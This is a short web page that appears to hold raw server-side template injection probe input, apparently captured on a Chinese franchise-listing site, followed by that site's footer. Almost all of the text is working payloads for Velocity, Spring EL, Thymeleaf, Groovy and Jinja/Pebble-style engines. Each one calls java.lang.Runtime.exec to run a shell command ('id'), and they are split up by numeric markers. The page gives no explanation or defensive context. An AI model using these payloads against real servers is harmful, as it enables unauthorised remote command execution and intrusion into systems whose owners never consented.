#set($rt = $class.forName("java.lang.Runtime")) #set($proc = $rt.getMethod("exec","".class).invoke($rt.getMethod("getRuntime").invoke(null),"id")) #set($is = $proc.getInputStream()) #set($reader = $class.forName("java.io.InputStreamReader").getDeclaredConstructors()[0].newInstance($is)) #set($sc = $class.forName("java.util.Scanner").getDeclaredConstructors()[0].newInstance($reader)) $sc.useDelimiter("\A").next() 1111 #set($rt = $class.forName("java.lang.Runtime")) #set($proc = $rt.getMethod("exec","".class).invoke($rt.getMethod("getRuntime").invoke(null),"id")) #set($is = $proc.getInputStream()) #set($reader = $class.forName("java.io.InputStreamReader").getDeclaredConstructors()[0].newInstance($is)) #set($sc = $class.forName("java.util.Scanner").getDeclaredConstructors()[0].newInstance($reader)) $sc.useDelimiter("\A").next() 2222 __${T(java.lang.Runtime).getRuntime().exec("id")}__:: ${T(java.lang.Runtime).getRuntime().exec("id")} 3333 ${"id".execute().text} ${["id"].execute().text} 4444 {% set cmd = "id" %} {% set exec = "".class.forName("java.lang.Runtime").getMethod("exec","".class).invoke("".class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),cmd) %} {{ exec.text }} 5555 #{T(java.lang.Runtime).getRuntime().exec("id")} ${T(java.lang.Runtime).getRuntime().exec(new String[]{"sh","-c","id"})} 66666 Process p = Runtime.getRuntime().exec("id"); new java.util.Scanner(p.getInputStream()).useDelimiter("\\A").next()
下载app
微信扫一扫
在线咨询
回到顶部
下载全球加盟网APP
直接沟通,让加盟和选址更轻松